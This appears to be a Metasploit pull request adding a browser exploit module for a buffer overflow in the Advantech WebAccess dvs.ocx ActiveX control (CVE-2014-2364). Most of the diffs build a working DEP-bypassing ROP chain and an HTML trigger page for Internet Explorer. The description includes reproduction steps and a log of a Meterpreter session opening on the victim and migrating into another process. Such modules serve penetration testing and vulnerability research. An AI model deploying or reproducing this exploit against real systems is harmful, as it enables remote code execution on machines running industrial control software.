### PR TITLE
Add module for ZDI-14-255  Advantech WebAccess dvs.ocx GetColor Buffer Overflow

### DIFF
--- a/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb
+++ b/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb
@@ -60,6 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def on_request_exploit(cli, request, target_info)
+    p "#{target_info}"
     print_status("Requested: #{request.uri}")
 
     content = <<-EOS
@@ -79,13 +80,47 @@ test.GetColor("#{sploit}", 0);
     xpl = Rex::Text.pattern_create(61) #offset
 
     #xpl << "BBBB" # EIP :-)
-    xpl << [0x60014184].pack("V") # POP ECX # RETN
+    xpl << [0x60014185].pack("V") # RET
     xpl << "CCCCDDDD"
     #xpl << (0x01..0x09).to_a.pack("C*") # ESP
     #xpl << (0x0b..0x0c).to_a.pack("C*")
     #xpl << (0x0e..0xff).to_a.pack("C*")
-    xpl << [0x60022653].pack("V") # (ecx => VirtualAlloc)
-    xpl << [0x6001f1c8].pack("V") # push , or, push or mov ret (edx = 40!)
+
+    # EDI = ESP (ptr to esp)
+    xpl << [0x600180ce].pack("V") # XOR EAX,EAX # RETN
+    xpl << [0x6001087d].pack("V")  # PUSH ESP # AND AL,10 # JNE IJL11+0X10485 (60010485) [BR=0] # POP EDI # POP ESI # POP EBP # POP EBX # POP ECX # RETN    ** [ijl11.dll] **   |  ascii {PAGE_EXECUTE_READ}
+    xpl << [0x41414141].pack("V") # esi
+    xpl << [0x60029f6c].pack("V") # ebp .data ijl11.dll
+    xpl << [0xfffffff8].pack("V") # ebx
+    xpl << [0xffffffff].pack("V") # ecx
+
+    # ECX = 0
+    xpl << [0x6002157e].pack("V") # POP EAX # RETN
+    xpl << [0x60029f6c].pack("V") # .data ijl11.dll
+    xpl << [0x6001b8ec].pack("V") # INC ECX # MOV DWORD PTR DS:[EAX],ECX # RETN
+
+    # eax = 0x40
+    xpl << [0x600180ce].pack("V") # XOR EAX,EAX # RETN
+    xpl << [0x600243ac].pack("V") # ADD EAX,0C # RETN
+    xpl << [0x600243ac].pack("V") # ADD EAX,0C # RETN
+    xpl << [0x600243ac].pack("V") # ADD EAX,0C # RETN
+    xpl << [0x600243ac].pack("V") # ADD EAX,0C # RETN
+    xpl << [0x600243ac].pack("V") # ADD EAX,0C # RETN
+    xpl << [0x600243ac].pack("V") # ADD EAX,0C # RETN
+
+    # edx = 0x40
+    xpl << [0x6001f0ec].pack("V") # XOR EDX,EDX # RETN
+    xpl << [0x60024eb6].pack("V") # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+8] # MUL EAX,ECX # ADD EDX,EBX # POP EBX # RETN 0x10
+    xpl << [0x41414141].pack("V")
+
+    # set VirtualAlloc stack and call!
+    xpl << [0x60014184].pack("V") # POP ECX # RETN
+    xpl << [0x41414141].pack("V")
+    xpl << [0x41414141].pack("V")
+    xpl << [0x41414141].pack("V")
+    xpl << [0x41414141].pack("V")
+    xpl << [0x60022653].pack("V") # (ecx => VirtualAlloc) (EDI ptr to address)
+    xpl << [0x6001f1c8].pack("V") # push edx # or al,39h # push ecx # or byte ptr [ebp+5], dh # mov eax, 1 # ret
     xpl << "A" * 1000
 
     xpl.gsub("\"", "\\\"") # Escape double quote, to not break javascript string

--- a/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb
+++ b/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb
@@ -1,0 +1,94 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::BrowserExploitServer
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Advantech WebAccess dvs.ocx GetColor Buffer Overflow',
+      'Description'    => %q{
+        This module exploits a buffer overflow vulnerability in Advantec WebAccess. The
+        vulnerability exists in the dvs.ocx ActiveX control, where a dangerous call to
+        sprintf can be reached with user controlled data through the GetColor function.
+        This module has been tested successfully on Windows 7 SP1 and IE 10.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Unknown', # Vulnerability discovery
+          'juan vazquez' # Metasploit module
+        ],
+      'References'     =>
+        [
+          ['CVE', '2014-2364'],
+          ['ZDI', '14-255'],
+          ['URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02']
+        ],
+      'DefaultOptions' =>
+        {
+          'InitialAutoRunScript' => 'migrate -f',
+        },
+      'BrowserRequirements' =>
+        {
+          :source   => /script|headers/i,
+          :os_name  => Msf::OperatingSystems::WINDOWS,
+          :ua_name  => /MSIE/i,
+          :clsid    => "{5CE92A27-9F6A-11D2-9D3D-000001155641}",
+          :method   => "GetColor"
+        },
+      'Payload'        =>
+        {
+          'Space'           => 2048,
+          'StackAdjustment' => -3500,
+          'DisableNopes'    => true,
+          'BadChars'        => "\x00\x0a\x0d"
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Automatic', { } ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jul 17 2014'))
+  end
+
+  def on_request_exploit(cli, request, target_info)
+    print_status("Requested: #{request.uri}")
+
+    content = <<-EOS
+<html>
+<object classid='clsid:5CE92A27-9F6A-11D2-9D3D-000001155641' id='test' /></object>
+<script language='javascript'>
+test.GetColor("#{sploit}", 0);
+</script>
+</html>
+    EOS
+
+    print_status("Sending #{self.name}")
+    send_response_html(cli, content)
+  end
+
+  def sploit
+    xpl = Rex::Text.pattern_create(61) #offset
+
+    #xpl << "BBBB" # EIP :-)
+    xpl << [0x60014184].pack("V") # POP ECX # RETN
+    xpl << "CCCCDDDD"
+    #xpl << (0x01..0x09).to_a.pack("C*") # ESP
+    #xpl << (0x0b..0x0c).to_a.pack("C*")
+    #xpl << (0x0e..0xff).to_a.pack("C*")
+    xpl << [0x60022653].pack("V") # (ecx => VirtualAlloc)
+    xpl << [0x6001f1c8].pack("V") # push , or, push or mov ret (edx = 40!)
+    xpl << "A" * 1000
+
+    xpl.gsub("\"", "\\\"") # Escape double quote, to not break javascript string
+  end
+
+end

--- a/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb
+++ b/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb
@@ -48,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote
         },
       'Payload'             =>
         {
-          'Space'           => 4096,
+          'Space'           => 1024,
           'DisableNops'     => true,
           'BadChars'        => "\x00\x0a\x0d\x5c",
           # Patch the stack to execute the decoder...
@@ -83,7 +83,7 @@ test.GetColor("#{rop_payload(get_payload(cli, target_info))}", 0);
     EOS
 
     print_status("Sending #{self.name}")
-    send_response_html(cli, content)
+    send_response_html(cli, content, {'Pragma' => 'no-cache'})
   end
 
   # Uses gadgets from ijl11.dll 1.1.2.16
@@ -91,14 +91,14 @@ test.GetColor("#{rop_payload(get_payload(cli, target_info))}", 0);
     xpl = rand_text_alphanumeric(61) # offset
     xpl << [0x60014185].pack("V")    # RET
     xpl << rand_text_alphanumeric(8)
-    # EDX = flAllocationType (0x1000)
+
+    # EBX = dwSize (0x40)
     xpl << [0x60012288].pack("V") # POP ECX # RETN
     xpl << [0xffffffff].pack("V") # ecx value
     xpl << [0x6002157e].pack("V") # POP EAX # RETN
-    xpl << [0x9ffdbf89].pack("V") # eax value
+    xpl << [0x9ffdafc9].pack("V") # eax value
     xpl << [0x60022b97].pack("V") # ADC EAX,60025078 # RETN
     xpl << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10
-    # EBX = dwSize (0x1000)
     xpl << [0x60018084].pack("V") # POP EBP # RETN
     xpl << rand_text_alphanumeric(4) # padding
     xpl << rand_text_alphanumeric(4) # padding
@@ -108,8 +108,19 @@ test.GetColor("#{rop_payload(get_payload(cli, target_info))}", 0);
     xpl << [0x60012288].pack("V") # POP ECX # RETN
     xpl << [0x60023588].pack("V") # ECX => (&POP EBX # RETN)
     xpl << [0x6001f1c8].pack("V") # push edx # or al,39h # push ecx # or byte ptr [ebp+5], dh # mov eax, 1 # ret
+    # EDX = flAllocationType (0x1000)
+    xpl << [0x60012288].pack("V") # POP ECX # RETN
+    xpl << [0xffffffff].pack("V") # ecx value
+    xpl << [0x6002157e].pack("V") # POP EAX # RETN
+    xpl << [0x9ffdbf89].pack("V") # eax value
+    xpl << [0x60022b97].pack("V") # ADC EAX,60025078 # RETN
+    xpl << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10
     # ECX = flProtect (0x40)
     xpl << [0x6002157e].pack("V") # POP EAX # RETN
+    xpl << rand_text_alphanumeric(4) # padding
+    xpl << rand_text_alphanumeric(4) # padding
+    xpl << rand_text_alphanumeric(4) # padding
+    xpl << rand_text_alphanumeric(4) # padding
     xpl << [0x60029f6c].pack("V") # .data ijl11.dll
     xpl << [0x60012288].pack("V") # POP ECX # RETN
     xpl << [0xffffffff].pack("V") # ecx value

--- a/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb
+++ b/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb
@@ -86,6 +86,7 @@ test.GetColor("#{rop_payload(get_payload(cli, target_info))}", 0);
     send_response_html(cli, content)
   end
 
+  # Uses gadgets from ijl11.dll 1.1.2.16
   def rop_payload(code)
     xpl = rand_text_alphanumeric(61) # offset
     xpl << [0x60014185].pack("V")    # RET

--- a/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb
+++ b/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb
@@ -12,62 +12,72 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Advantech WebAccess dvs.ocx GetColor Buffer Overflow',
-      'Description'    => %q{
+      'Name'                => 'Advantech WebAccess dvs.ocx GetColor Buffer Overflow',
+      'Description'         => %q{
         This module exploits a buffer overflow vulnerability in Advantec WebAccess. The
         vulnerability exists in the dvs.ocx ActiveX control, where a dangerous call to
         sprintf can be reached with user controlled data through the GetColor function.
-        This module has been tested successfully on Windows 7 SP1 and IE 10.
+        This module has been tested successfully on Windows XP SP3 with IE6 and Windows
+        7 SP1 with IE8 and IE 9.
       },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
+      'License'             => MSF_LICENSE,
+      'Author'              =>
         [
           'Unknown', # Vulnerability discovery
           'juan vazquez' # Metasploit module
         ],
-      'References'     =>
+      'References'          =>
         [
           ['CVE', '2014-2364'],
           ['ZDI', '14-255'],
           ['URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02']
         ],
-      'DefaultOptions' =>
+      'DefaultOptions'      =>
         {
-          'InitialAutoRunScript' => 'migrate -f',
+          'Retries'              => false,
+          'InitialAutoRunScript' => 'migrate -f'
         },
       'BrowserRequirements' =>
         {
-          :source   => /script|headers/i,
-          :os_name  => Msf::OperatingSystems::WINDOWS,
-          :ua_name  => /MSIE/i,
-          :clsid    => "{5CE92A27-9F6A-11D2-9D3D-000001155641}",
-          :method   => "GetColor"
+          :source  => /script|headers/i,
+          :os_name => Msf::OperatingSystems::WINDOWS,
+          :ua_name => /MSIE/i,
+          :ua_ver  => lambda { |ver| Gem::Version.new(ver) <  Gem::Version.new('10') },
+          :clsid   => "{5CE92A27-9F6A-11D2-9D3D-000001155641}",
+          :method  => "GetColor"
         },
-      'Payload'        =>
+      'Payload'             =>
         {
-          'Space'           => 2048,
-          'StackAdjustment' => -3500,
-          'DisableNopes'    => true,
-          'BadChars'        => "\x00\x0a\x0d"
+          'Space'           => 4096,
+          'DisableNops'     => true,
+          'BadChars'        => "\x00\x0a\x0d\x5c",
+          # Patch the stack to execute the decoder...
+          'PrependEncoder'  => "\x81\xc4\x9c\xff\xff\xff", # add esp, -100
+          # Fix the stack again, this time better :), before the payload
+          # is executed.
+          'Prepend'         => "\x64\xa1\x18\x00\x00\x00" + # mov eax, fs:[0x18]
+                               "\x83\xC0\x08"             + # add eax, byte 8
+                               "\x8b\x20"                 + # mov esp, [eax]
+                               "\x81\xC4\x30\xF8\xFF\xFF"  # add esp, -2000
         },
-      'Platform'       => 'win',
-      'Targets'        =>
+      'Platform'            => 'win',
+      'Arch'                => ARCH_X86,
+      'Targets'             =>
         [
           [ 'Automatic', { } ]
         ],
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => 'Jul 17 2014'))
+      'DefaultTarget'       => 0,
+      'DisclosureDate'      => 'Jul 17 2014'))
   end
 
   def on_request_exploit(cli, request, target_info)
-    p "#{target_info}"
     print_status("Requested: #{request.uri}")
 
     content = <<-EOS
 <html>
 <object classid='clsid:5CE92A27-9F6A-11D2-9D3D-000001155641' id='test' /></object>
 <script language='javascript'>
-test.GetColor("#{sploit}", 0);
+test.GetColor("#{rop_payload(get_payload(cli, target_info))}", 0);
 </script>
 </html>
     EOS
@@ -76,54 +86,57 @@ test.GetColor("#{sploit}", 0);
     send_response_html(cli, content)
   end
 
-  def sploit
-    xpl = Rex::Text.pattern_create(61) #offset
-
-    #xpl << "BBBB" # EIP :-)
-    xpl << [0x60014185].pack("V") # RET
-    xpl << "CCCCDDDD"
-    #xpl << (0x01..0x09).to_a.pack("C*") # ESP
-    #xpl << (0x0b..0x0c).to_a.pack("C*")
-    #xpl << (0x0e..0xff).to_a.pack("C*")
-
-    # EDI = ESP (ptr to esp)
-    xpl << [0x600180ce].pack("V") # XOR EAX,EAX # RETN
-    xpl << [0x6001087d].pack("V")  # PUSH ESP # AND AL,10 # JNE IJL11+0X10485 (60010485) [BR=0] # POP EDI # POP ESI # POP EBP # POP EBX # POP ECX # RETN    ** [ijl11.dll] **   |  ascii {PAGE_EXECUTE_READ}
-    xpl << [0x41414141].pack("V") # esi
-    xpl << [0x60029f6c].pack("V") # ebp .data ijl11.dll
-    xpl << [0xfffffff8].pack("V") # ebx
-    xpl << [0xffffffff].pack("V") # ecx
-
-    # ECX = 0
+  def rop_payload(code)
+    xpl = rand_text_alphanumeric(61) # offset
+    xpl << [0x60014185].pack("V")    # RET
+    xpl << rand_text_alphanumeric(8)
+    # EDX = flAllocationType (0x1000)
+    xpl << [0x60012288].pack("V") # POP ECX # RETN
+    xpl << [0xffffffff].pack("V") # ecx value
+    xpl << [0x6002157e].pack("V") # POP EAX # RETN
+    xpl << [0x9ffdbf89].pack("V") # eax value
+    xpl << [0x60022b97].pack("V") # ADC EAX,60025078 # RETN
+    xpl << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10
+    # EBX = dwSize (0x1000)
+    xpl << [0x60018084].pack("V") # POP EBP # RETN
+    xpl << [0x41414141].pack("V") # padding
+    xpl << [0x41414141].pack("V") # padding
+    xpl << [0x41414141].pack("V") # padding
+    xpl << [0x41414141].pack("V") # padding
+    xpl << [0x60029f6c].pack("V") # .data ijl11.dll
+    xpl << [0x60012288].pack("V") # POP ECX # RETN
+    xpl << [0x60023588].pack("V") # ECX => (&POP EBX # RETN)
+    xpl << [0x6001f1c8].pack("V") # push edx # or al,39h # push ecx # or byte ptr [ebp+5], dh # mov eax, 1 # ret
+    # ECX = flProtect (0x40)
     xpl << [0x6002157e].pack("V") # POP EAX # RETN
     xpl << [0x60029f6c].pack("V") # .data ijl11.dll
-    xpl << [0x6001b8ec].pack("V") # INC ECX # MOV DWORD PTR DS:[EAX],ECX # RETN
+    xpl << [0x60012288].pack("V") # POP ECX # RETN
+    xpl << [0xffffffff].pack("V") # ecx value
+    0x41.times do
+      xpl << [0x6001b8ec].pack("V") # INC ECX # MOV DWORD PTR DS:[EAX],ECX # RETN
+    end
+    # EAX = ptr to &VirtualAlloc()
+    xpl << [0x6001db7e].pack("V") # POP EAX # RETN [ijl11.dll]
+    xpl << [0x600250c8].pack("V") # ptr to &VirtualAlloc() [IAT ijl11.dll]
+    # EBP = POP (skip 4 bytes)
+    xpl << [0x6002054b].pack("V") # POP EBP # RETN
+    xpl << [0x6002054b].pack("V") # ptr to &(# pop ebp # retn)
+    # ESI = ptr to JMP [EAX]
+    xpl << [0x600181cc].pack("V") # POP ESI # RETN
+    xpl << [0x6002176e].pack("V") # ptr to &(# jmp[eax])
+    # EDI = ROP NOP (RETN)
+    xpl << [0x60021ad1].pack("V") # POP EDI # RETN
+    xpl << [0x60021ad2].pack("V") # ptr to &(retn)
+    # ESP = lpAddress (automatic)
+    # PUSHAD # RETN
+    xpl << [0x60018399].pack("V") # PUSHAD # RETN
+    xpl << [0x6001c5cd].pack("V") # ptr to &(# push esp # retn)
+    xpl << code
 
-    # eax = 0x40
-    xpl << [0x600180ce].pack("V") # XOR EAX,EAX # RETN
-    xpl << [0x600243ac].pack("V") # ADD EAX,0C # RETN
-    xpl << [0x600243ac].pack("V") # ADD EAX,0C # RETN
-    xpl << [0x600243ac].pack("V") # ADD EAX,0C # RETN
-    xpl << [0x600243ac].pack("V") # ADD EAX,0C # RETN
-    xpl << [0x600243ac].pack("V") # ADD EAX,0C # RETN
-    xpl << [0x600243ac].pack("V") # ADD EAX,0C # RETN
+    xpl.gsub!("\"", "\\\"") # Escape double quote, to not break javascript string
+    xpl.gsub!("\\", "\\\\") # Escape back slash, to avoid javascript escaping
 
-    # edx = 0x40
-    xpl << [0x6001f0ec].pack("V") # XOR EDX,EDX # RETN
-    xpl << [0x60024eb6].pack("V") # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+8] # MUL EAX,ECX # ADD EDX,EBX # POP EBX # RETN 0x10
-    xpl << [0x41414141].pack("V")
-
-    # set VirtualAlloc stack and call!
-    xpl << [0x60014184].pack("V") # POP ECX # RETN
-    xpl << [0x41414141].pack("V")
-    xpl << [0x41414141].pack("V")
-    xpl << [0x41414141].pack("V")
-    xpl << [0x41414141].pack("V")
-    xpl << [0x60022653].pack("V") # (ecx => VirtualAlloc) (EDI ptr to address)
-    xpl << [0x6001f1c8].pack("V") # push edx # or al,39h # push ecx # or byte ptr [ebp+5], dh # mov eax, 1 # ret
-    xpl << "A" * 1000
-
-    xpl.gsub("\"", "\\\"") # Escape double quote, to not break javascript string
+    xpl
   end
 
 end

--- a/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb
+++ b/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb
@@ -75,10 +75,19 @@ class Metasploit3 < Msf::Exploit::Remote
 
     content = <<-EOS
 <html>
+<head>
+<meta http-equiv="cache-control" content="max-age=0" />
+<meta http-equiv="cache-control" content="no-cache" />
+<meta http-equiv="expires" content="0" />
+<meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT" />
+<meta http-equiv="pragma" content="no-cache" />
+</head>
+<body>
 <object classid='clsid:5CE92A27-9F6A-11D2-9D3D-000001155641' id='test' /></object>
 <script language='javascript'>
 test.GetColor("#{rop_payload(get_payload(cli, target_info))}", 0);
 </script>
+</body>
 </html>
     EOS
 

--- a/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb
+++ b/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb
@@ -100,10 +100,10 @@ test.GetColor("#{rop_payload(get_payload(cli, target_info))}", 0);
     xpl << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10
     # EBX = dwSize (0x1000)
     xpl << [0x60018084].pack("V") # POP EBP # RETN
-    xpl << [0x41414141].pack("V") # padding
-    xpl << [0x41414141].pack("V") # padding
-    xpl << [0x41414141].pack("V") # padding
-    xpl << [0x41414141].pack("V") # padding
+    xpl << rand_text_alphanumeric(4) # padding
+    xpl << rand_text_alphanumeric(4) # padding
+    xpl << rand_text_alphanumeric(4) # padding
+    xpl << rand_text_alphanumeric(4) # padding
     xpl << [0x60029f6c].pack("V") # .data ijl11.dll
     xpl << [0x60012288].pack("V") # POP ECX # RETN
     xpl << [0x60023588].pack("V") # ECX => (&POP EBX # RETN)


### PR DESCRIPTION
Tested on IE 6 / Windows XP SP3, IE8 / Windows 7 SP1, IE9 / Windows 8 SP1. Uses ijl11.dll for the ROP chain, since the DLL isn't ASLR enabled.
## Verification
- [x] Install Windows with IE <= 9 (updated IE 10, even on Windows 7 SP1, comes with forceASLR. And this modules use ijl11.dll to build the ROP chain)
- [x] Download a version of Advantech WebAccess vulnerable. I've used http://advantech.vo.llnwd.net/o35/www/webaccess/webaccess7.1/AdvanrechWebAccessUSANode_2013.05.30_1.1.5.exe for developing.
- [x] Install WebAccess
- [ ] Install the vulnerable actvx. The vulnerable control can be found inside C:\WebAccess\Node\atoplc.cab (Install the cab or just decompress the cab and just use regsvr32 to register the dvs.ocx).
- [ ] Once you've the vulnerable activex control installed, use the msf module to get sessions.**Note**: When visiting the exploit page, a MessageBox will popup, once the user tries to close or press ok, exploitation happens (The vulnerability occurs when building the error message for the MessageBox).

```
[*] 10.6.0.82        advantech_webaccess_dvs_getcolor - Gathering target information.
[*] 10.6.0.82        advantech_webaccess_dvs_getcolor - Sending response HTML.
[*] 10.6.0.82        advantech_webaccess_dvs_getcolor - Requested: /1DRGKDfDB/lYdpKB/
[*] 10.6.0.82        advantech_webaccess_dvs_getcolor - Sending Advantech WebAccess dvs.ocx GetColor Buffer Overflow
[*] Sending stage (769536 bytes) to 10.6.0.82
[*] Meterpreter session 2 opened (10.6.0.82:4444 -> 10.6.0.82:58920) at 2014-09-16 16:34:43 -0500
[*] Session ID 2 (10.6.0.82:4444 -> 10.6.0.82:58920) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: IEXPLORE.EXE (3240)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3588
[+] Successfully migrated to process
```
